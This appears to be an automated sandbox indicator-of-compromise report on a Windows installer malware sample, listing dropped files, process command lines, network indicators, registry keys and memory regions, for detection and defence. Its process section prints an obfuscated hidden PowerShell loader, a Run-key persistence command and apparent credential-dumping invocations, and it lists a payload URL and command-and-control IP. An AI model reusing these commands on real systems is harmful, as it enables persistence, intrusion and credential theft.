IOC Report
SecuriteInfo.com.FileRepMalware.12793.28433.exe

loading gif

Files

File Path
Type
Category
Malicious
SecuriteInfo.com.FileRepMalware.12793.28433.exe
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
initial sample
malicious
C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales\Ekspertenhed\plyndrer\SecuriteInfo.com.FileRepMalware.12793.28433.exe
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
dropped
malicious
C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales\Ekspertenhed\plyndrer\SecuriteInfo.com.FileRepMalware.12793.28433.exe:Zone.Identifier
ASCII text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales\Skeletonlike.pas
ASCII text, with very long lines (54310), with no line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\json[1].json
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_juo4rwoj.wzk.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zm4bh3pc.eev.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\bhvB258.tmp
Extensible storage engine DataBase, version 0x620, checksum 0x517d4aba, page size 32768, DirtyShutdown, Windows version 10.0
dropped
C:\Users\user\AppData\Local\Temp\coqd
Unicode text, UTF-16, little-endian text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales\Ekspertenhed\plyndrer\starveacre.sne
data
dropped
C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales\Ekspertenhed\plyndrer\ukrudtsplanten.txt
ASCII text, with very long lines (397), with no line terminators
dropped
C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales\Ekspertenhed\skyrens.laa
data
dropped
C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales\Skillemnters.Bel
data
dropped
C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales\quadrifoil.tap
data
dropped
There are 5 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe
"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -windowstyle hidden "$Semiexpositive=Get-Content 'C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales\Skeletonlike.pas';$Folkedyb=$Semiexpositive.SubString(54300,3);.$Folkedyb($Semiexpositive)"
malicious
C:\Program Files (x86)\Windows Mail\wabmig.exe
"C:\Program Files (x86)\windows mail\wabmig.exe"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Markedsandel" /t REG_EXPAND_SZ /d "%Rykningspaategningens% -windowstyle minimized $Unbaked=(Get-ItemProperty -Path 'HKCU:\kompositioner\').Batikker;%Rykningspaategningens% ($Unbaked)"
malicious
C:\Program Files (x86)\Windows Mail\wabmig.exe
"C:\Program Files (x86)\windows mail\wabmig.exe" /stext "C:\Users\user\AppData\Local\Temp\coqd"
malicious
C:\Program Files (x86)\Windows Mail\wabmig.exe
"C:\Program Files (x86)\windows mail\wabmig.exe" /stext "C:\Users\user\AppData\Local\Temp\nivooon"
malicious
C:\Program Files (x86)\Windows Mail\wabmig.exe
"C:\Program Files (x86)\windows mail\wabmig.exe" /stext "C:\Users\user\AppData\Local\Temp\xkahpgyvtl"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Markedsandel" /t REG_EXPAND_SZ /d "%Rykningspaategningens% -windowstyle minimized $Unbaked=(Get-ItemProperty -Path 'HKCU:\kompositioner\').Batikker;%Rykningspaategningens% ($Unbaked)"

URLs

Name
IP
Malicious
107.173.4.16
malicious
http://nuget.org/NuGet.exe
unknown
http://www.imvu.comr
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://geoplugin.net/json.gpl
unknown
http://geoplugin.net/json.gpk
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
http://cmgtrading.eu/CubBVEODo227.bin~
unknown
https://cmgtrading.eu/=
unknown
https://contoso.com/License
unknown
http://cmgtrading.eu/CubBVEODo227.bin
185.26.107.57
http://www.imvu.com
unknown
https://contoso.com/Icon
unknown
https://cmgtrading.eu/CubBVEODo227.binc
unknown
https://cmgtrading.eu/k
unknown
http://www.imvu.coma
unknown
http://www.nirsoft.net
unknown
http://nsis.sf.net/NSIS_ErrorError
unknown
https://github.com/Pester/Pester
unknown
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
unknown
https://cmgtrading.eu/CubBVEODo227.bin
185.26.107.57
http://geoplugin.net/json.gp
178.237.33.50
https://www.google.com
unknown
https://aka.ms/pscore6lB
unknown
http://cmgtrading.eu/CubBVEODo227.binzRZs
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
http://geoplugin.net/json.gpR
unknown
https://www.google.com/accounts/servicelogin
unknown
https://login.yahoo.com/config/login
unknown
http://www.nirsoft.net/
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://www.ebuddy.com
unknown
There are 23 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
cmgtrading.eu
185.26.107.57
geoplugin.net
178.237.33.50

IPs

IP
Domain
Country
Malicious
107.173.4.16
unknown
United States
malicious
185.26.107.57
cmgtrading.eu
France
178.237.33.50
geoplugin.net
Netherlands

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Rmc-DSGECX
exepath
malicious
HKEY_CURRENT_USER\SOFTWARE\Rmc-DSGECX
licence
malicious
HKEY_CURRENT_USER\SOFTWARE\Rmc-DSGECX
time
malicious
HKEY_CURRENT_USER\enodation\paulina\cloriodid
Oplysningskontoret
HKEY_CURRENT_USER\langsad\behandlingstid\Returnerendes76
shavee
HKEY_CURRENT_USER\Miljankenvnene144\Uninstall\discoverability\Dragoners
grundstoffets
HKEY_CURRENT_USER\kompositioner
Batikker
HKEY_CURRENT_USER\Environment
Rykningspaategningens
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Markedsandel

Memdumps

Base Address
Regiontype
Protect
Malicious
772A000
heap
page read and write
malicious
772A000
heap
page read and write
malicious
772A000
heap
page read and write
malicious
C4AF000
direct allocation
page execute and read and write
malicious
7728000
heap
page read and write
malicious
4B19000
heap
page read and write
8970000
trusted library allocation
page read and write
53C6000
heap
page read and write
4B10000
heap
page read and write
520000
heap
page read and write
C97000
stack
page read and write
792000
heap
page read and write
4B19000
heap
page read and write
2321B000
unclassified section
page execute and read and write
4B1C000
heap
page read and write
3090000
direct allocation
page read and write
233E1000
heap
page read and write
78C0000
trusted library allocation
page execute and read and write
4B72000
heap
page read and write
4B38000
heap
page read and write
2F8E000
heap
page read and write
75F5000
heap
page read and write
30B0000
direct allocation
page read and write
65EF000
remote allocation
page execute and read and write
79C000
heap
page read and write
5011000
heap
page read and write
340F000
stack
page read and write
7726000
heap
page read and write
D40000
direct allocation
page read and write
4B3A000
heap
page read and write
7705000
heap
page read and write
7719000
heap
page read and write
785E000
stack
page read and write
77A0000
direct allocation
page read and write
792000
heap
page read and write
88E000
stack
page read and write
4B19000
heap
page read and write
4FAE000
stack
page read and write
3060000
direct allocation
page read and write
78E6000
heap
page read and write
7782000
heap
page read and write
70F000
stack
page read and write
4B14000
heap
page read and write
30A0000
direct allocation
page read and write
7960000
trusted library allocation
page read and write
3010000
heap
page readonly
4B1B000
heap
page read and write
7791000
heap
page read and write
78B0000
trusted library allocation
page read and write
720000
heap
page read and write
3100000
trusted library allocation
page read and write
777E000
heap
page read and write
3034000
heap
page read and write
400000
system
page execute and read and write
3080000
direct allocation
page read and write
2ACB000
stack
page read and write
2F20000
heap
page read and write
4B21000
heap
page read and write
400000
system
page execute and read and write
23B60000
heap
page read and write
4B11000
heap
page read and write
4B78000
heap
page read and write
5011000
heap
page read and write
357E000
stack
page read and write
786000
heap
page read and write
75C6000
heap
page read and write
5011000
heap
page read and write
4B53000
heap
page read and write
83FD000
stack
page read and write
76A8000
heap
page read and write
23385000
heap
page read and write
380C000
heap
page read and write
22DEF000
stack
page read and write
3208000
heap
page read and write
D20000
direct allocation
page read and write
23ACD000
unclassified section
page execute and read and write
410000
heap
page read and write
23B70000
heap
page read and write
27C0000
heap
page read and write
4B6C000
heap
page read and write
8C0000
heap
page read and write
400000
unkown
page readonly
78F0000
trusted library allocation
page read and write
7777000
heap
page read and write
741E000
stack
page read and write
232E1000
heap
page read and write
2ED0000
trusted library section
page read and write
2F94000
heap
page read and write
408000
unkown
page readonly
2F94000
heap
page read and write
5310000
trusted library allocation
page read and write
3034000
heap
page read and write
23385000
heap
page read and write
4B3A000
heap
page read and write
4B11000
heap
page read and write
427000
unkown
page read and write
5011000
heap
page read and write
2357D000
heap
page read and write
5DE000
stack
page read and write
7880000
direct allocation
page read and write
4B14000
heap
page read and write
4B26000
heap
page read and write
400000
system
page execute and read and write
2F94000
heap
page read and write
2FE9000
heap
page read and write
4B1E000
heap
page read and write
21F0000
heap
page read and write
4B1C000
heap
page read and write
4B1C000
heap
page read and write
7B1000
heap
page read and write
4B5B000
heap
page read and write
23358000
heap
page read and write
4B20000
heap
page read and write
456000
system
page execute and read and write
4B20000
heap
page read and write
4B11000
heap
page read and write
7870000
direct allocation
page read and write
48F0000
trusted library allocation
page read and write
798000
heap
page read and write
30F3000
trusted library allocation
page execute and read and write
2F94000
heap
page read and write
777B000
heap
page read and write
41B000
heap
page read and write
5011000
heap
page read and write
493E000
stack
page read and write
3125000
trusted library allocation
page execute and read and write
311A000
trusted library allocation
page execute and read and write
7510000
heap
page read and write
2306E000
stack
page read and write
2ECA000
stack
page read and write
2F30000
heap
page read and write
3034000
heap
page read and write
87D7000
heap
page read and write
78E0000
trusted library allocation
page read and write
2F30000
trusted library allocation
page read and write
2FFE000
stack
page read and write
2EE0000
heap
page read and write
4ECE000
stack
page read and write
41B000
system
page execute and read and write
84F0000
trusted library allocation
page read and write
233E1000
heap
page read and write
400000
unkown
page readonly
7270000
heap
page read and write
2F94000
heap
page read and write
22F9D000
stack
page read and write
5310000
trusted library allocation
page read and write
27D9000
heap
page read and write
5310000
trusted library allocation
page read and write
3C60000
remote allocation
page execute and read and write
4B10000
heap
page read and write
2F2A000
heap
page read and write
3034000
heap
page read and write
4B11000
heap
page read and write
47EF000
remote allocation
page execute and read and write
7810000
direct allocation
page read and write
4B31000
heap
page read and write
235E6000
heap
page read and write
76A0000
heap
page read and write
4B1C000
heap
page read and write
5011000
heap
page read and write
776E000
heap
page read and write
7B1000
heap
page read and write
5010000
heap
page read and write
59D000
stack
page read and write
5011000
heap
page read and write
776E000
heap
page read and write
5E0000
heap
page read and write
798000
heap
page read and write
30DF000
stack
page read and write
27D0000
heap
page read and write
4B31000
heap
page read and write
3120000
trusted library allocation
page read and write
2F9A000
heap
page read and write
302F000
heap
page read and write
7772000
heap
page read and write
4B21000
heap
page read and write
2FA0000
heap
page read and write
789D000
stack
page read and write
2EE6000
heap
page read and write
7690000
direct allocation
page read and write
78C0000
heap
page read and write
4B3E000
heap
page read and write
84B5000
trusted library allocation
page read and write
23200000
unclassified section
page execute and read and write
4B11000
heap
page read and write
23A70000
unclassified section
page execute and read and write
4B10000
heap
page read and write
2F94000
heap
page read and write
45D000
system
page execute and read and write
2F94000
heap
page read and write
798000
heap
page read and write
2289000
heap
page read and write
327E000
stack
page read and write
4B36000
heap
page read and write
22DAE000
stack
page read and write
D10000
heap
page read and write
781E000
stack
page read and write
2B50000
heap
page read and write
435000
unkown
page read and write
2F94000
heap
page read and write
2336A000
heap
page read and write
310E000
stack
page read and write
4B53000
heap
page read and write
4B25000
heap
page read and write
6121000
trusted library allocation
page read and write
6149000
trusted library allocation
page read and write
236D0000
heap
page read and write
4B53000
heap
page read and write
3034000
heap
page read and write
777E000
heap
page read and write
2F8E000
stack
page read and write
8500000
trusted library allocation
page read and write
8990000
heap
page read and write
4F20000
heap
page read and write
4B11000
heap
page read and write
45E000
unkown
page read and write
8770000
heap
page read and write
8370000
heap
page read and write
7790000
trusted library allocation
page read and write
2F94000
heap
page read and write
79C000
heap
page read and write
6FEF000
remote allocation
page execute and read and write
4B3E000
heap
page read and write
9120000
direct allocation
page execute and read and write
22EC0000
direct allocation
page read and write
5A21000
trusted library allocation
page read and write
4B1C000
heap
page read and write
2FB0000
heap
page readonly
4B31000
heap
page read and write
34C0000
heap
page read and write
D50000
direct allocation
page read and write
23020000
remote allocation
page read and write
432000
heap
page read and write
348E000
stack
page read and write
2357B000
heap
page read and write
843F000
stack
page read and write
4B31000
heap
page read and write
530F000
stack
page read and write
4F0E000
stack
page read and write
3034000
heap
page read and write
3034000
heap
page read and write
4B1E000
heap
page read and write
3034000
heap
page read and write
54E1000
heap
page read and write
51AF000
stack
page read and write
236A0000
heap
page read and write
786000
heap
page read and write
89B0000
trusted library allocation
page read and write
2FF2000
heap
page read and write
798000
heap
page read and write
7733000
heap
page read and write
4B4E000
heap
page read and write
4B11000
heap
page read and write
5310000
trusted library allocation
page read and write
42C000
unkown
page read and write
23246000
direct allocation
page execute and read and write
4B1E000
heap
page read and write
3109000
trusted library allocation
page read and write
75CF000
heap
page read and write
480000
heap
page read and write
2F95000
heap
page read and write
4B20000
heap
page read and write
84E0000
trusted library allocation
page read and write
4B31000
heap
page read and write
4B31000
heap
page read and write
4E80000
heap
page execute and read and write
5011000
heap
page read and write
33C0000
heap
page read and write
2EFC000
stack
page read and write
3141000
heap
page read and write
497E000
stack
page read and write
2200000
heap
page read and write
2F94000
heap
page read and write
4B25000
heap
page read and write
792000
heap
page read and write
4B11000
heap
page read and write
4E85000
heap
page execute and read and write
2F00000
direct allocation
page read and write
4B31000
heap
page read and write
2F94000
heap
page read and write
4B2B000
heap
page read and write
23595000
heap
page read and write
5608000
heap
page read and write
2F60000
heap
page read and write
2F68000
heap
page read and write
40A000
unkown
page read and write
5011000
heap
page read and write
27DE000
heap
page read and write
879F000
heap
page read and write
27D6000
heap
page read and write
2336A000
heap
page read and write
2F2E000
heap
page read and write
79C000
heap
page read and write
2FE7000
heap
page read and write
4B8F000
heap
page read and write
7B1000
heap
page read and write
23671000
heap
page read and write
86EC000
stack
page read and write
89C0000
direct allocation
page execute and read and write
5B0000
heap
page read and write
344E000
stack
page read and write
7850000
direct allocation
page read and write
5018000
heap
page read and write
4B35000
heap
page read and write
4B20000
heap
page read and write
233E1000
heap
page read and write
4AF0000
heap
page read and write
4998000
trusted library allocation
page read and write
4B20000
heap
page read and write
59E000
stack
page read and write
2F94000
heap
page read and write
2F94000
heap
page read and write
5011000
heap
page read and write
4B8F000
heap
page read and write
79C000
heap
page read and write
4B3A000
heap
page read and write
7820000
direct allocation
page read and write
7B1000
heap
page read and write
4B35000
heap
page read and write
233E0000
heap
page read and write
27DD000
heap
page read and write
4B31000
heap
page read and write
5011000
heap
page read and write
4B1E000
heap
page read and write
5011000
heap
page read and write
776D000
heap
page read and write
786000
heap
page read and write
3034000
heap
page read and write
2F94000
heap
page read and write
2FF7000
heap
page read and write
2F94000
heap
page read and write
5BEF000
remote allocation
page execute and read and write
22F4F000
stack
page read and write
5AE000
stack
page read and write
3020000
heap
page read and write
3165000
heap
page read and write
7772000
heap
page read and write
7BA000
heap
page read and write
7500000
heap
page execute and read and write
4B19000
heap
page read and write
BAAF000
direct allocation
page execute and read and write
5011000
heap
page read and write
4FEF000
stack
page read and write
4B31000
heap
page read and write
A6AF000
direct allocation
page execute and read and write
4B11000
heap
page read and write
7970000
trusted library allocation
page read and write
22FDD000
stack
page read and write
5011000
heap
page read and write
51EF000
remote allocation
page execute and read and write
27DA000
heap
page read and write
5A29000
trusted library allocation
page read and write
7782000
heap
page read and write
4FB1000
heap
page read and write
5310000
trusted library allocation
page read and write
4B31000
heap
page read and write
2F2A000
heap
page read and write
2FB0000
heap
page read and write
9CAF000
direct allocation
page execute and read and write
777E000
heap
page read and write
462000
unkown
page readonly
92AF000
direct allocation
page execute and read and write
3034000
heap
page read and write
8460000
trusted library allocation
page read and write
2F30000
heap
page read and write
2336B000
heap
page read and write
792000
heap
page read and write
78D0000
trusted library allocation
page read and write
5011000
heap
page read and write
5011000
heap
page read and write
311E000
stack
page read and write
23AF0000
unclassified section
page execute and read and write
4B31000
heap
page read and write
55FB000
heap
page read and write
54F2000
heap
page read and write
4B2D000
heap
page read and write
4B14000
heap
page read and write
7780000
trusted library allocation
page read and write
2BAE000
stack
page read and write
2AE2000
stack
page read and write
323E000
stack
page read and write
7900000
trusted library allocation
page read and write
3137000
heap
page read and write
42F000
unkown
page read and write
4AEF000
stack
page read and write
4B6C000
heap
page read and write
4B53000
heap
page read and write
5011000
heap
page read and write
79C000
heap
page read and write
4B53000
heap
page read and write
3650000
trusted library allocation
page read and write
3034000
heap
page read and write
4B2E000
heap
page read and write
BD000
stack
page read and write
B0AF000
direct allocation
page execute and read and write
30F0000
trusted library allocation
page read and write
3070000
direct allocation
page read and write
4B20000
heap
page read and write
2660000
heap
page read and write
7727000
heap
page read and write
750000
heap
page read and write
408000
unkown
page readonly
5011000
heap
page read and write
776E000
heap
page read and write
23AC9000
unclassified section
page execute and read and write
7260000
heap
page read and write
4B33000
heap
page read and write
7728000
heap
page read and write
23AE3000
unclassified section
page execute and read and write
22B7C000
stack
page read and write
87C2000
heap
page read and write
2F94000
heap
page read and write
4B4F000
heap
page read and write
212E000
stack
page read and write
77E0000
direct allocation
page read and write
8450000
heap
page read and write
4B11000
heap
page read and write
74F0000
trusted library allocation
page read and write
7990000
trusted library allocation
page read and write
3034000
heap
page read and write
2357B000
heap
page read and write
8780000
heap
page read and write
4B1E000
heap
page read and write
232E1000
heap
page read and write
4B1E000
heap
page read and write
4B20000
heap
page read and write
89A0000
trusted library allocation
page execute and read and write
4B56000
heap
page read and write
4B65000
heap
page read and write
4B44000
heap
page read and write
32B0000
heap
page read and write
776D000
heap
page read and write
473000
system
page execute and read and write
2F95000
heap
page read and write
4B4E000
heap
page read and write
2FDB000
heap
page read and write
2F95000
heap
page read and write
4B14000
heap
page read and write
786000
heap
page read and write
2AAC000
stack
page read and write
2F30000
heap
page read and write
4B44000
heap
page read and write
7733000
heap
page read and write
7830000
direct allocation
page read and write
87C8000
heap
page read and write
4B31000
heap
page read and write
87B5000
heap
page read and write
309F000
stack
page read and write
5011000
heap
page read and write
4B20000
heap
page read and write
30F4000
trusted library allocation
page read and write
3DEF000
remote allocation
page execute and read and write
2F94000
heap
page read and write
7720000
trusted library allocation
page read and write
7930000
trusted library allocation
page read and write
5310000
trusted library allocation
page read and write
4B72000
heap
page read and write
23670000
heap
page read and write
792000
heap
page read and write
4B38000
heap
page read and write
22F0E000
stack
page read and write
4B37000
heap
page read and write
23230000
direct allocation
page read and write
7910000
trusted library allocation
page read and write
2F94000
heap
page read and write
3490000
heap
page read and write
4B1E000
heap
page read and write
78F000
unkown
page read and write
79C000
heap
page read and write
4FB0000
heap
page read and write
4B3A000
heap
page read and write
2210000
heap
page read and write
313F000
heap
page read and write
2F95000
heap
page read and write
2F94000
heap
page read and write
3034000
heap
page read and write
5710000
heap
page read and write
2B60000
heap
page readonly
2F95000
heap
page read and write
4D90000
trusted library allocation
page read and write
2ADF000
stack
page read and write
C5C000
stack
page read and write
2BB0000
heap
page read and write
302C000
heap
page read and write
4B20000
heap
page read and write
2F95000
heap
page read and write
4B11000
heap
page read and write
22EB0000
direct allocation
page read and write
2EF0000
direct allocation
page read and write
7791000
heap
page read and write
74F7000
trusted library allocation
page read and write
4B2E000
heap
page read and write
85C0000
trusted library allocation
page read and write
777E000
heap
page read and write
5310000
trusted library allocation
page read and write
77F0000
direct allocation
page read and write
5DF000
stack
page read and write
3034000
heap
page read and write
4B14000
heap
page read and write
3120000
heap
page read and write
5011000
heap
page read and write
7730000
trusted library allocation
page read and write
4E2E000
stack
page read and write
3128000
heap
page read and write
4B33000
heap
page read and write
79DB000
stack
page read and write
2357D000
heap
page read and write
19A000
stack
page read and write
8380000
trusted library allocation
page execute and read and write
32B8000
heap
page read and write
62CF000
trusted library allocation
page read and write
777E000
heap
page read and write
758000
heap
page read and write
3034000
heap
page read and write
D30000
direct allocation
page read and write
4B3C000
heap
page read and write
217E000
stack
page read and write
5011000
heap
page read and write
4A30000
trusted library allocation
page execute and read and write
4B25000
heap
page read and write
786000
heap
page read and write
4B3E000
heap
page read and write
3034000
heap
page read and write
4B1E000
heap
page read and write
2F0E000
stack
page read and write
4B11000
heap
page read and write
2F70000
heap
page read and write
85E0000
trusted library allocation
page read and write
33CD000
heap
page read and write
7B7000
heap
page read and write
76C9000
heap
page read and write
4B4A000
heap
page read and write
54F3000
heap
page read and write
3122000
trusted library allocation
page read and write
27F0000
heap
page readonly
7BA000
heap
page read and write
A00000
heap
page read and write
3200000
heap
page read and write
23358000
heap
page read and write
40A000
unkown
page write copy
94F000
stack
page read and write
2F95000
heap
page read and write
4B11000
heap
page read and write
4B31000
heap
page read and write
4B3C000
heap
page read and write
4B28000
heap
page read and write
4B49000
heap
page read and write
4B20000
heap
page read and write
4A2E000
stack
page read and write
776E000
heap
page read and write
8390000
trusted library allocation
page read and write
4B10000
heap
page read and write
23358000
heap
page read and write
7840000
direct allocation
page read and write
84E4000
trusted library allocation
page read and write
4B4E000
heap
page read and write
78E0000
heap
page read and write
4B20000
heap
page read and write
4B1F000
heap
page read and write
5276000
trusted library allocation
page read and write
2F20000
direct allocation
page read and write
8510000
trusted library allocation
page read and write
4B25000
heap
page read and write
87A9000
heap
page read and write
776D000
heap
page read and write
77DE000
stack
page read and write
4B10000
heap
page read and write
4B1C000
heap
page read and write
23020000
heap
page read and write
2F3B000
stack
page read and write
2214000
heap
page read and write
2FC0000
heap
page read and write
2354C000
heap
page read and write
4B35000
heap
page read and write
7537000
heap
page read and write
4B21000
heap
page read and write
5110000
heap
page execute and read and write
4B21000
heap
page read and write
777E000
heap
page read and write
32CD000
heap
page read and write
86AC000
stack
page read and write
4B31000
heap
page read and write
3158000
heap
page read and write
4E6E000
stack
page read and write
4B8F000
heap
page read and write
23B4C000
unclassified section
page execute and read and write
3800000
heap
page read and write
4B10000
heap
page read and write
23020000
remote allocation
page read and write
7B1000
heap
page read and write
23590000
heap
page read and write
752C000
heap
page read and write
2314D000
stack
page read and write
7740000
trusted library allocation
page read and write
798000
heap
page read and write
5314000
heap
page read and write
2E8C000
stack
page read and write
22C7F000
stack
page read and write
5011000
heap
page read and write
1BD000
stack
page read and write
78A0000
direct allocation
page read and write
4B14000
heap
page read and write
27C5000
heap
page read and write
776D000
heap
page read and write
4980000
heap
page readonly
4B25000
heap
page read and write
232E0000
heap
page read and write
7799000
heap
page read and write
531F000
heap
page read and write
2F90000
heap
page read and write
798000
heap
page read and write
5011000
heap
page read and write
7799000
heap
page read and write
2F10000
direct allocation
page read and write
3150000
heap
page read and write
5011000
heap
page read and write
2AE4000
stack
page read and write
7FD40000
trusted library allocation
page execute and read and write
4B18000
heap
page read and write
3030000
heap
page read and write
6190000
trusted library allocation
page read and write
7B1000
heap
page read and write
2FE0000
heap
page read and write
30FD000
trusted library allocation
page execute and read and write
8470000
trusted library allocation
page execute and read and write
7631000
heap
page read and write
3110000
trusted library allocation
page read and write
22C80000
heap
page read and write
367F000
stack
page read and write
27D0000
heap
page read and write
2341C000
heap
page read and write
846D000
trusted library allocation
page read and write
2AC6000
stack
page read and write
5011000
heap
page read and write
4FB1000
heap
page read and write
77D0000
direct allocation
page read and write
98000
stack
page read and write
22E90000
direct allocation
page read and write
23B46000
unclassified section
page execute and read and write
4A47000
heap
page read and write
4A40000
heap
page read and write
2F94000
heap
page read and write
7768000
heap
page read and write
4B4A000
heap
page read and write
27DD000
heap
page read and write
2280000
heap
page read and write
2354C000
heap
page read and write
7772000
heap
page read and write
422000
unkown
page read and write
4B8F000
heap
page read and write
54E5000
heap
page read and write
27CF000
stack
page read and write
4B19000
heap
page read and write
307E000
stack
page read and write
5716000
heap
page read and write
2F94000
heap
page read and write
4B2E000
heap
page read and write
2F94000
heap
page read and write
462000
unkown
page readonly
4B31000
heap
page read and write
7800000
direct allocation
page read and write
23231000
direct allocation
page execute and read and write
2318E000
stack
page read and write
234D3000
heap
page read and write
8980000
trusted library allocation
page execute and read and write
D60000
heap
page read and write
2F29000
heap
page read and write
4F29000
heap
page read and write
7BA000
heap
page read and write
4B37000
heap
page read and write
777E000
heap
page read and write
4B5E000
heap
page read and write
7980000
trusted library allocation
page read and write
22C3E000
stack
page read and write
7547000
heap
page read and write
5011000
heap
page read and write
4DEE000
stack
page read and write
745E000
stack
page read and write
757B000
heap
page read and write
6129000
trusted library allocation
page read and write
2F94000
heap
page read and write
4B2E000
heap
page read and write
56E000
unkown
page read and write
9797000
trusted library allocation
page read and write
4F6E000
stack
page read and write
2F27000
heap
page read and write
2F3D000
stack
page read and write
3803000
heap
page read and write
53B9000
heap
page read and write
7940000
trusted library allocation
page read and write
45C000
system
page execute and read and write
4B3A000
heap
page read and write
2310C000
stack
page read and write
77C0000
direct allocation
page read and write
2285000
heap
page read and write
401000
unkown
page execute read
8440000
heap
page read and write
62BC000
trusted library allocation
page read and write
777E000
heap
page read and write
3034000
heap
page read and write
77B0000
direct allocation
page read and write
5A23000
trusted library allocation
page read and write
2F50000
trusted library section
page read and write
2F2D000
heap
page read and write
777E000
heap
page read and write
4B1E000
heap
page read and write
5011000
heap
page read and write
600000
heap
page read and write
2357D000
heap
page read and write
2336B000
heap
page read and write
49EC000
stack
page read and write
5011000
heap
page read and write
4B33000
heap
page read and write
7890000
direct allocation
page read and write
8367000
stack
page read and write
7602000
heap
page read and write
5121000
trusted library allocation
page read and write
22B3D000
stack
page read and write
7860000
direct allocation
page read and write
4B53000
heap
page read and write
2EFD000
stack
page read and write
5000000
heap
page read and write
26CF000
stack
page read and write
22EA0000
direct allocation
page read and write
2336B000
heap
page read and write
436000
heap
page read and write
8A0000
heap
page read and write
459000
system
page execute and read and write
792000
heap
page read and write
5011000
heap
page read and write
4B34000
heap
page read and write
230AF000
stack
page read and write
4F32000
heap
page read and write
890000
heap
page read and write
4B1E000
heap
page read and write
23020000
remote allocation
page read and write
4B31000
heap
page read and write
30E0000
trusted library allocation
page read and write
401000
unkown
page execute read
4F6E000
stack
page read and write
4B1C000
heap
page read and write
517D000
trusted library allocation
page read and write
7920000
trusted library allocation
page read and write
4B20000
heap
page read and write
7950000
trusted library allocation
page read and write
331F000
stack
page read and write
62D5000
trusted library allocation
page read and write
3130000
heap
page read and write
5011000
heap
page read and write
231CF000
stack
page read and write
4B4E000
heap
page read and write
520F000
stack
page read and write
4B25000
heap
page read and write
There are 743 hidden memdumps, click here to show them.